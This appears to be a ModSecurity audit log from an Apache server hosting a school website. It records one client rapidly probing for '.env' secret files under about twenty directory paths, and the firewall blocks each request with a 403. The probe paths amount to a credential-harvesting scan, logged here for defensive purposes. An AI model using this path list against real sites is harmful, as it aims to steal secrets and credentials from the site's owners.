Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29f35d27-Z-- --cddd632b-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NngAAABI 103.236.140.4 38300 103.236.140.4 8181 --cddd632b-B-- GET /database/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cddd632b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cddd632b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901666519 572 (- - -) Stopwatch2: 1745151901666519 572; combined=204, p1=172, p2=0, p3=0, p4=0, p5=32, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cddd632b-Z-- --b8edba07-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RQAAAJU 103.236.140.4 38302 103.236.140.4 8181 --b8edba07-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --b8edba07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8edba07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901738928 616 (- - -) Stopwatch2: 1745151901738928 616; combined=245, p1=173, p2=0, p3=0, p4=0, p5=72, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8edba07-Z-- --eaf8ec20-A-- [20/Apr/2025:19:25:01 +0700] aATnnVu16wJWB6g0mU8NnwAAAA4 103.236.140.4 38304 103.236.140.4 8181 --eaf8ec20-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --eaf8ec20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eaf8ec20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901814134 895 (- - -) Stopwatch2: 1745151901814134 895; combined=345, p1=298, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eaf8ec20-Z-- --6324b83b-A-- [20/Apr/2025:19:25:01 +0700] aATnncTCDeBrh52UaHS-RgAAAIo 103.236.140.4 38306 103.236.140.4 8181 --6324b83b-B-- GET /assets/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6324b83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6324b83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901885784 853 (- - -) Stopwatch2: 1745151901885784 853; combined=306, p1=258, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6324b83b-Z-- --a4f3a579-A-- [20/Apr/2025:19:25:01 +0700] aATnnVTf0pL9EQC7JDUZ1QAAAE0 103.236.140.4 38308 103.236.140.4 8181 --a4f3a579-B-- GET /fileweb/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a4f3a579-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4f3a579-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151901956957 880 (- - -) Stopwatch2: 1745151901956957 880; combined=373, p1=337, p2=0, p3=0, p4=0, p5=35, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4f3a579-Z-- --801b007f-A-- [20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-RwAAAIE 103.236.140.4 38310 103.236.140.4 8181 --801b007f-B-- GET /l53/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --801b007f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --801b007f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902030806 676 (- - -) Stopwatch2: 1745151902030806 676; combined=221, p1=190, p2=0, p3=0, p4=0, p5=31, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --801b007f-Z-- --1e5a584f-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoAAAAAc 103.236.140.4 38312 103.236.140.4 8181 --1e5a584f-B-- GET /club/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --1e5a584f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e5a584f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902101123 887 (- - -) Stopwatch2: 1745151902101123 887; combined=346, p1=295, p2=0, p3=0, p4=0, p5=51, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e5a584f-Z-- --04575f50-A-- [20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1gAAAEc 103.236.140.4 38314 103.236.140.4 8181 --04575f50-B-- GET /app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --04575f50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04575f50-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902171619 765 (- - -) Stopwatch2: 1745151902171619 765; combined=303, p1=256, p2=0, p3=0, p4=0, p5=47, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04575f50-Z-- --80ac107c-A-- [20/Apr/2025:19:25:02 +0700] aATnnsTCDeBrh52UaHS-SAAAAJg 103.236.140.4 38316 103.236.140.4 8181 --80ac107c-B-- GET /apps/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --80ac107c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80ac107c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902257378 955 (- - -) Stopwatch2: 1745151902257378 955; combined=397, p1=326, p2=0, p3=0, p4=0, p5=70, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80ac107c-Z-- --09cc063f-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1AAAAMs 103.236.140.4 38318 103.236.140.4 8181 --09cc063f-B-- GET /uploads/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --09cc063f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09cc063f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902343852 850 (- - -) Stopwatch2: 1745151902343852 850; combined=311, p1=265, p2=0, p3=0, p4=0, p5=46, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09cc063f-Z-- --a23a4c31-A-- [20/Apr/2025:19:25:02 +0700] aATnnlTf0pL9EQC7JDUZ1wAAAEk 103.236.140.4 38320 103.236.140.4 8181 --a23a4c31-B-- GET /sitemaps/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a23a4c31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a23a4c31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902414833 766 (- - -) Stopwatch2: 1745151902414833 766; combined=284, p1=248, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a23a4c31-Z-- --009fa32c-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NoQAAABE 103.236.140.4 38322 103.236.140.4 8181 --009fa32c-B-- GET /site/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --009fa32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --009fa32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902485951 923 (- - -) Stopwatch2: 1745151902485951 923; combined=395, p1=349, p2=0, p3=0, p4=0, p5=46, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --009fa32c-Z-- --c0ef0745-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1QAAANU 103.236.140.4 38324 103.236.140.4 8181 --c0ef0745-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --c0ef0745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0ef0745-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902565224 759 (- - -) Stopwatch2: 1745151902565224 759; combined=271, p1=228, p2=0, p3=0, p4=0, p5=43, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0ef0745-Z-- --cc5da622-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1gAAANI 103.236.140.4 38326 103.236.140.4 8181 --cc5da622-B-- GET /web/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cc5da622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc5da622-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902638142 645 (- - -) Stopwatch2: 1745151902638142 645; combined=260, p1=233, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc5da622-Z-- --e5846232-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NogAAAAA 103.236.140.4 38328 103.236.140.4 8181 --e5846232-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e5846232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5846232-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902707868 732 (- - -) Stopwatch2: 1745151902707868 732; combined=332, p1=222, p2=0, p3=0, p4=0, p5=110, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5846232-Z-- --14cad354-A-- [20/Apr/2025:19:25:02 +0700] aATnnlu16wJWB6g0mU8NowAAABc 103.236.140.4 38330 103.236.140.4 8181 --14cad354-B-- GET /resources/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --14cad354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14cad354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902778738 714 (- - -) Stopwatch2: 1745151902778738 714; combined=266, p1=231, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14cad354-Z-- --fa882275-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr1wAAANM 103.236.140.4 38332 103.236.140.4 8181 --fa882275-B-- GET /sistema/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --fa882275-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa882275-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902849086 739 (- - -) Stopwatch2: 1745151902849086 739; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa882275-Z-- --2a765e66-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2AAAANA 103.236.140.4 38334 103.236.140.4 8181 --2a765e66-B-- GET /en/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --2a765e66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a765e66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902921201 741 (- - -) Stopwatch2: 1745151902921201 741; combined=326, p1=294, p2=0, p3=0, p4=0, p5=31, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a765e66-Z-- --349f071c-A-- [20/Apr/2025:19:25:02 +0700] aATnnkAzeWrUIk0gvAsr2QAAAM8 103.236.140.4 38336 103.236.140.4 8181 --349f071c-B-- GET /tools/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --349f071c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --349f071c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151902995702 694 (- - -) Stopwatch2: 1745151902995702 694; combined=257, p1=215, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
